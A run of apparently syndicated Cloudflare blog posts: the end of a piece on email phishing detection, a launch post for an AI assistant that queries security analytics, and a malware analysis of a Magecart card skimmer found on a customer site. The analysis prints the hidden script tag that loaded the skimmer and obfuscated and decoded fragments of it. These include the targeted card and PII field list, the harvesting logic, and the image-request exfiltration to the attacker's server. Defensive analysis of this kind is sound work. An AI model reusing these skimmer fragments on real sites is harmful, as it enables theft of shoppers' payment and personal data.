As you can see, the body and subject of a message are a small portion of what makes an email to be an email. When performing analysis on emails, our models holistically look at every aspect of a message to make an assessment of its safety. Some of our models do focus their analysis on the body of the message for indicators like sentiment, but the ultimate assessment of the message’s risk is performed in concert with models evaluating every aspect of the email. All this information is surfaced to the security practitioners that are using our products.

Cloudflare’s email security models

Our philosophy of using multiple models trained on different properties of messages culminates in what we call our SPARSE engine. In the 2023 Forrester Wave™ for Enterprise Email Security report, the analysts mentioned our ability to catch phishing emails using our SPARSE engine saying “Cloudflare uses its preemptive crawling approach to discover phishing campaign infrastructure as it’s being built. Its Small Pattern Analytics Engine (SPARSE) combines multiple machine learning models, including natural language modeling, sentiment and structural analysis, and trust graphs”. 1

Our SPARSE engine is continually updated using messages we observe. Given our ability to analyze billions of messages a year, we are able to detect trends earlier and feed these into our models to improve their efficacy. A recent example of this is when we noticed in late 2023 a rise in QR code attacks. Attackers deployed different techniques to obfuscate the QR code so that OCR scanners could not scan the image but cellphone cameras would direct the user to the malicious link. These techniques included making the image incredibly small so that it was not clear for scanners or pixel shifting images. However, feeding these messages into our models trained them to look at all the qualities about the emails sent from those campaigns. With this combination of data, we were able to create detections to catch these campaigns before they hit customers’ inboxes.

Our approach to preemptive scanning makes us resistant to oscillations of threat actor behavior. Even though the use of LLMs is a tool that attackers are deploying more frequently today, there will be others in the future, and we will be able to defend our customers from those threats as well.

Future of email phishing

Securing email inboxes is a difficult task given the creative ways attackers try to phish users. This field is ever evolving and will continue to change dramatically as new technologies become accessible to the public. Trends like the use of generative AI will continue to change, but our methodology and approach to building email detections keeps our customers protected.

If you are interested in how Cloudflare’s Cloud Email Security works to protect your organization against phishing threats please reach out to your Cloudflare contact and set up a free Phishing Risk Assessment. For Microsoft 365 customers, you can also run our complementary retro scan to see what phishing emails your current solution has missed. More information on that can be found in our recent blog post.

Want to learn more about our solution? Sign up for a complementary Phish Risk Assessment.

[1] Source: The Forrester Wave™: Enterprise Email Security, Q2, 2023

The Forrester Wave™ is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave are trademarks of Forrester Research, Inc. The Forrester Wave is a graphical representation of Forrester’s call on a market and is plotted using a detailed spreadsheet with exposed scores, weightings, and comments. Forrester does not endorse any vendor, product, or service depicted in the Forrester Wave. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change.

Cloudflare launches AI Assistant for Security Analytics

Post Syndicated from Jen Sells original https://blog.cloudflare.com/security-analytics-ai-assistant

Imagine you are in the middle of an attack on your most crucial production application, and you need to understand what’s going on. How happy would you be if you could simply log into the Dashboard and type a question such as: “Compare attack traffic between US and UK” or “Compare rate limiting blocks for automated traffic with rate limiting blocks from human traffic” and see a time series chart appear on your screen without needing to select a complex set of filters?

Today, we are introducing an AI assistant to help you query your security event data, enabling you to more quickly discover anomalies and potential security attacks. You can now use plain language to interrogate Cloudflare analytics and let us do the magic.

What did we build?

One of the big challenges when analyzing a spike in traffic or any anomaly in your traffic is to create filters that isolate the root cause of an issue. This means knowing your way around often complex dashboards and tools, knowing where to click and what to filter on.

On top of this, any traditional security dashboard is limited to what you can achieve by the way data is stored, how databases are indexed, and by what fields are allowed when creating filters. With our Security Analytics view, for example, it was difficult to compare time series with different characteristics. For example, you couldn’t compare the traffic from IP address x.x.x.x with automated traffic from Germany without opening multiple tabs to Security Analytics and filtering separately. From an engineering perspective, it would be extremely hard to build a system that allows these types of unconstrained comparisons.

With the AI Assistant, we are removing this complexity by leveraging our Workers AI platform to build a tool that can help you query your HTTP request and security event data and generate time series charts based on a request formulated with natural language. Now the AI Assistant does the hard work of figuring out the necessary filters and additionally can plot multiple series of data on a single graph to aid in comparisons. This new tool opens up a new way of interrogating data and logs, unconstrained by the restrictions introduced by traditional dashboards.

Now it is easier than ever to get powerful insights about your application security by using plain language to interrogate your data and better understand how Cloudflare is protecting your business. The new AI Assistant is located in the Security Analytics dashboard and works seamlessly with the existing filters. The answers you need are just a question away.

What can you ask?

To demonstrate the capabilities of AI Assistant, we started by considering the questions that we ask ourselves every day when helping customers to deploy the best security solutions for their applications.

We’ve included some clickable examples in the dashboard to get you started.

You can use the AI Assistant to

  • Identify the source of a spike in attack traffic by asking: “Compare attack traffic between US and UK”
  • Identify root cause of 5xx errors by asking: “Compare origin and edge 5xx errors”
  • See which browsers are most commonly used by your users by asking:”Compare traffic across major web browsers”
  • For an ecommerce site, understand what percentage of users visit vs add items to their shopping cart by asking: “Compare traffic between /api/login and /api/basket”
  • Identify bot attacks against your ecommerce site by asking: “Show requests to /api/basket with a bot score less than 20”
  • Identify the HTTP versions used by clients by asking: “Compare traffic by each HTTP version”
  • Identify unwanted automated traffic to specific endpoints by asking: “Show POST requests to /admin with a Bot Score over 30”

You can start from these when exploring the AI Assistant.

How does it work?

Using Cloudflare’s powerful Workers AI global network inference platform, we were able to use one of the off-the-shelf large language models (LLMs) offered on the platform to convert customer queries into GraphQL filters. By teaching an AI model about the available filters we have on our Security Analytics GraphQL dataset, we can have the AI model turn a request such as “Compare attack traffic on /api and /admin endpoints”  into a matching set of structured filters:

  {“name”: “Attack Traffic on /api”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/api”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]},
  {“name”: “Attack Traffic on /admin”, “filters”: [{“key”: “clientRequestPath”, “operator”: “eq”, “value”: “/admin”}, {“key”: “wafAttackScoreClass”, “operator”: “eq”, “value”: “attack”}]}

Then, using the filters provided by the AI model, we can make requests to our GraphQL APIs, gather the requisite data, and plot a data visualization to answer the customer query.

By using this method, we are able to keep customer information private and avoid exposing any security analytics data to the AI model itself, while still allowing humans to query their data with ease. This ensures that your queries will never be used to train the model. And because Workers AI hosts a local instance of the LLM on Cloudflare’s own network, your queries and resulting data never leave Cloudflare’s network.

Future Development

We are in the early stages of developing this capability and plan to rapidly extend the capabilities of the Security Analytics AI Assistant. Don’t be surprised if we cannot handle some of your requests at the beginning. At launch, we are able to support basic inquiries that can be plotted in a time series chart such as “show me” or “compare” for any currently filterable fields.

However, we realize there are a number of use cases that we haven’t even thought of, and we are excited to release the Beta version of AI Assistant to all Business and Enterprise customers to let you test the feature and see what you can do with it. We would love to hear your feedback and learn more about what you find useful and what you would like to see in it next. With future versions, you’ll be able to ask questions such as “Did I experience any attacks yesterday?” and use AI to automatically generate WAF rules for you to apply to mitigate them.

Beta availability

Starting today, AI Assistant is available for a select few users and rolling out to all Business and Enterprise customers throughout March. Look out for it and try for free and let us know what you think by using the Feedback link at the top of the Security Analytics page.

Final pricing will be determined prior to general availability.

Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website

Post Syndicated from Himanshu Anand original https://blog.cloudflare.com/navigating-the-maze-of-magecart

The Cloudflare security research team reviews and evaluates scripts flagged by Cloudflare Page Shield, focusing particularly on those with low scores according to our machine learning (ML) model, as low scores indicate the model thinks they are malicious. It was during one of these routine reviews that we stumbled upon a peculiar script on a customer’s website, one that was being fetched from a zone unfamiliar to us, a new and uncharted territory in our digital map.

This script was not only obfuscated but exhibited some suspicious behavior, setting off alarm bells within our team. Its complexity and the mysterious nature piqued our curiosity, and we decided to delve deeper, to unravel the enigma of what this script was truly up to.

In our quest to decipher the script’s purpose, we geared up to dissect its layers, determined to shed light on its hidden intentions and understand the full scope of its actions.

The Infection Mechanism: A seemingly harmless HTML div element housed a piece of JavaScript, a trojan horse lying in wait.

<div style="display: none; visibility: hidden;">
<script src="//cdn.jsdelivr.at/js/sidebar.min.js"></script>
The script was the conduit for the malicious activities

The devil in the details

The script hosted at the aforementioned domain was a piece of obfuscated JavaScript, a common tactic used by attackers to hide their malicious intent from casual observation. The obfuscated code can be examined in detail through the snapshot provided by Cloudflare Radar URL Scanner.

Obfuscated script snippet:

function _0x5383(_0x411252,_0x2f6ba1){var _0x1d211f=_0x1d21();return _0x5383=function(_0x5383da,_0x5719da){_0x5383da=_0x5383da-0x101;var _0x3d97e9=_0x1d211f[_0x5383da];return _0x3d97e9;},_0x5383(_0x411252,_0x2f6ba1);}var _0x11e3ed=_0x5383;(function(_0x3920b4,_0x32875c){var _0x3147a9=_0x5383,_0x5c373e=_0x3920b4();while(!![]){try{var _0x5e0fb6=-parseInt(_0x3147a9(0x13e))/0x1*(parseInt(_0x3147a9(0x151))/0x2)+parseInt(_0x3147a9(0x168))/0x3*(parseInt(_0x3147a9(0x136))/0x4)+parseInt(_0x3147a9(0x15d))/0x5*(parseInt(_0x3147a9(0x152))/0x6)+-parseInt(_0x3147a9(0x169))/0x7*(-parseInt(_0x3147a9(0x142))/0x8)+parseInt(_0x3147a9(0x143))/0x9+-parseInt(_0x3147a9(0x14b))/0xa+-parseInt(_0x3147a9(0x150))/0xb;if(_0x5e0fb6===_0x32875c)break;else _0x5c373e['push'](_0x5c373e['shift']());}catch(_0x1f0719){_0x5c373e['push'](_0x5c373e['shift']());}}}(_0x1d21,0xbc05c));function _0x1d21(){var _0x443323=['3439548foOmOf',

The primary objective of this script was to steal Personally Identifiable Information (PII), including credit card details. The stolen data was then transmitted to a server controlled by the attackers, located at https://jsdelivr[.]at/f[.]php.

Decoding the malicious domain

Before diving deeper into the exact behaviors of a script, examining the hosted domain and its insights could already reveal valuable arguments for overall evaluation. Regarding the hosted domain cdn.jsdelivr.at used in this script:

  • It was registered on 2022-04-14.
  • It impersonates the well-known hosting service jsDelivr, which is hosted at cdn.jsdelivr.net.
  • It was registered by 1337team Limited, a company known for providing bulletproof hosting services. These services are frequently utilized in various cybercrime campaigns due to their resilience against law enforcement actions and their ability to host illicit activities without interruption.
  • Previous mentions of this hosting provider, such as in a tweet by @malwrhunterteam, highlight its involvement in cybercrime activities. This further emphasizes the reputation of 1337team Limited in the cybercriminal community and its role in facilitating malicious campaigns.

Decoding the malicious script

Data Encoding and Decoding Functions: The script uses two functions, wvnso.jzzys and wvnso.cvdqe, for encoding and decoding data. They employ Base64 and URL encoding techniques, common methods in malware to conceal the real nature of the data being sent.

var wvnso = {
  "jzzys": function (_0x5f38f3) {
    return btoa(encodeURIComponent(_0x5f38f3).replace(/%([0-9A-F]{2})/g, function (_0x7e416, _0x1cf8ee) {
      return String.fromCharCode('0x' + _0x1cf8ee);
  "cvdqe": function (_0x4fdcee) {
    return decodeURIComponent(Array.prototype.map.call(atob(_0x4fdcee), function (_0x273fb1) {
      return '%' + ('00' + _0x273fb1.charCodeAt(0x0).toString(0x10)).slice(-0x2);

Targeted Data Fields: The script is designed to identify and monitor specific input fields on the website. These fields include sensitive information like credit card numbers, names, email addresses, and other personal details. The wvnso.cwwez function maps these fields, showing that the attackers had carefully studied the website’s layout.

"cwwez": window.JSON.parse(wvnso.cvdqe("W1siZmllbGQiLCAiaWZyYW1lIiwgMCwgIm4iLCAiTnVtYmVyIl0sIFsibmFtZSIsICJmaXJzdG5hbWUiLCAwLCAiZiIsICJIb2xkZXIiXSwgWyJuYW1lIiwgImxhc3RuYW1lIiwgMCwgImwiLCAiSG9sZGVyIl0sIFsiZmllbGQiLCAiaWZyYW1lIiwgMCwgImUiLCAiRGF0ZSJdLCBbImZpZWxkIiwgImlmcmFtZSIsIDAsICJjIiwgIkNWViJdLCBbImlkIiwgImN1c3RvbWVyLWVtYWlsIiwgMCwgImVsIiwgImVtYWlsIl0sIFsibmFtZSIsICJ0ZWxlcGhvbmUiLCAwLCAicGUiLCAicGhvbmUiXSwgWyJuYW1lIiwgImNpdHkiLCAwLCAiY3kiLCAiY2l0eSJdLCBbIm5hbWUiLCAicmVnaW9uX2lkIiwgMywgInNlIiwgInN0YXRlIl0sIFsibmFtZSIsICJyZWdpb24iLCAwLCAic2UiLCAic3RhdGUiXSwgWyJuYW1lIiwgImNvdW50cnlfaWQiLCAwLCAiY3QiLCAiQ291bnRyeSJdLCBbIm5hbWUiLCAicG9zdGNvZGUiLCAwLCAienAiLCAiWmlwIl0sIFsiaWQiLCAiY3VzdG9tZXItcGFzc3dvcmQiLCAwLCAicGQiLCAicGFzc3dvcmQiXSwgWyJuYW1lIiwgWyJzdHJlZXRbMF0iLCAic3RyZWV0WzFdIiwgInN0cmVldFsyXSJdLCAwLCAiYXMiLCAiYWRkciJdXQ==")),

Data Harvesting Logic: The script uses a set of complex functions ( wvnso.uvesz,  wvnso.wsrmf, etc.) to check each targeted field for user input. When it finds the data it wants (like credit card details), it collects (“harvests”) this data and gets it ready to be sent out (“exfiltrated”).

"uvesz": function (_0x52b255) {
    for (var _0x356fbe = 0x0; _0x356fbe < wvnso.cwwez.length; _0x356fbe++) {
      var _0x25348a = wvnso.cwwez[_0x356fbe];
      if (_0x52b255.hasAttribute(_0x25348a[0x0])) {
        if (typeof _0x25348a[0x1] == "object") {
          var _0xca9068 = '';
          _0x25348a[0x1].forEach(function (_0x450919) {
            var _0x907175 = document.querySelector('[' + _0x25348a[0x0] + "=\"" + _0x450919 + "\"" + ']');
            if (_0x907175 != null && wvnso.wsrmf(_0x907175, _0x25348a[0x2]).length > 0x0) {
              _0xca9068 += wvnso.wsrmf(_0x907175, _0x25348a[0x2]) + " ";
          wvnso.krwon[_0x25348a[0x4]] = _0xca9068.trim();
        } else {
          if (_0x52b255.attributes[_0x25348a[0x0]].value == _0x25348a[0x1] && wvnso.wsrmf(_0x52b255, _0x25348a[0x2]).length > 0x0) {
            if (_0x25348a[0x3] == 'l') {
              wvnso.krwon[_0x25348a[0x4]] += " " + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
            } else {
              if (_0x25348a[0x3] == 'y') {
                wvnso.krwon[_0x25348a[0x4]] += '/' + wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);
              } else {
                wvnso.krwon[_0x25348a[0x4]] = wvnso.wsrmf(_0x52b255, _0x25348a[0x2]);

Stealthy Data Exfiltration: After harvesting the data, the script sends it secretly to the attacker’s server (located at https://jsdelivr[.]at/f[.]php). This process is done in a way that mimics normal Internet traffic, making it hard to detect. It creates an Image HTML element programmatically (not displayed to the user) and sets its src attribute to a specific URL. This URL is the attacker’s server where the stolen data is sent.

"eubtc": function () {
    var _0x4b786d = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    if (wvnso.pqemy() && !(wvnso.rnhok.indexOf(_0x4b786d) != -0x1)) {
      var _0x49c81a = wvnso.spyed.createElement("IMG");
      _0x49c81a.src = wvnso.cvdqe("aHR0cHM6Ly9qc2RlbGl2ci5hdC9mLnBocA==") + '?hash=' + _0x4b786d;

Persistent Monitoring: The script keeps a constant watch on user input. This means that any data entered into the targeted fields is captured, not just when the page first loads, but continuously as long as the user is on the page.

Execution Interval: The script is set to activate its data-collecting actions at regular intervals, as shown by the window.setInterval(wvnso.bumdr, 0x1f4) function call. This ensures that it constantly checks for new user input on the site.

window.setInterval(wvnso.bumdr, 0x1f4);

Local Data Storage: Interestingly, the script uses local storage methods (wvnso.hajfd, wvnso.ijltb) to keep the collected data on the user’s device. This could be a way to prevent data loss in case there are issues with the Internet connection or to gather more data before sending it to the server.

"ijltb": function () {
    var _0x19c563 = wvnso.jzzys(window.JSON.stringify(wvnso.krwon));
    window.localStorage.setItem("oybwd", _0x19c563);
  "hajfd": function () {
    var _0x1318e0 = window.localStorage.getItem("oybwd");
    if (_0x1318e0 !== null) {
      wvnso.krwon = window.JSON.parse(wvnso.cvdqe(_0x1318e0));

This JavaScript code is a sophisticated tool for stealing sensitive information from users. It’s well-crafted to avoid detection, gather detailed information, and transmit it discreetly to a remote server controlled by the attackers.

Proactive detection

Page Shield’s existing machine learning algorithm is capable of automatically detecting malicious JavaScript code. As cybercriminals evolve their attack methods, we are constantly improving our detection and defense mechanisms. An upcoming version of our ML model, an artificial neural network, has been designed to maintain high recall (i.e., identifying the many different types of malicious scripts) while also providing a low false positive rate (i.e., reducing false alerts for benign code). The new version of Page Shield’s ML automatically flagged the above script as a Magecart type attack with a very high probability. In other words, our ML correctly identified a novel attack script operating in the wild! Cloudflare customers with Page Shield enabled will soon be able to take further advantage of our latest ML’s superior protection for client-side security. Stay tuned for more details.

What you can do

The attack on a Cloudflare customer is a sobering example of the Magecart threat. It underscores the need for constant vigilance and robust client-side security measures for websites, especially those handling sensitive user data. This incident is a reminder that cybersecurity is not just about protecting data but also about safeguarding the trust and well-being of users.

We recommend the following actions to enhance security and protect against similar threats. Our comprehensive security model includes several products specifically designed to safeguard web applications and sensitive data:

  1. Implement WAF Managed Rule Product: This solution offers robust protection against known attacks by monitoring and filtering HTTP traffic between a web application and the Internet. It effectively guards against common web exploits.
  2. Deploy ML-Based WAF Attack Score: Our ML-based WAF, known as Attack Score, is specifically engineered to defend against previously unknown attacks. It uses advanced machine learning algorithms to analyze web traffic patterns and identify potential threats, providing an additional layer of security against sophisticated and emerging threats.
  3. Use Page Shield: Page Shield is designed to protect against Magecart-style attacks and browser supply chain threats. It monitors and secures third-party scripts running on your website, helping you identify malicious activity and proactively prevent client-side attacks, such as theft of sensitive customer data. This tool is crucial for preventing data breaches originating from compromised third-party vendors or scripts running in the browser.
  4. Activate Sensitive Data Detection (SDD): SDD alerts you if certain sensitive data is being exfiltrated from your website, whether due to an attack or a configuration error. This feature is essential for maintaining compliance with data protection regulations and for promptly addressing any unauthorized data leakage.


[1]: https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore
[2]: https://www.bizcommunity.com/Article/196/661/241908.html
[3]: https://nationaldailyng.com/trend-micro-teams-up-with-interpol-to-fight-african-cybercrime-networks/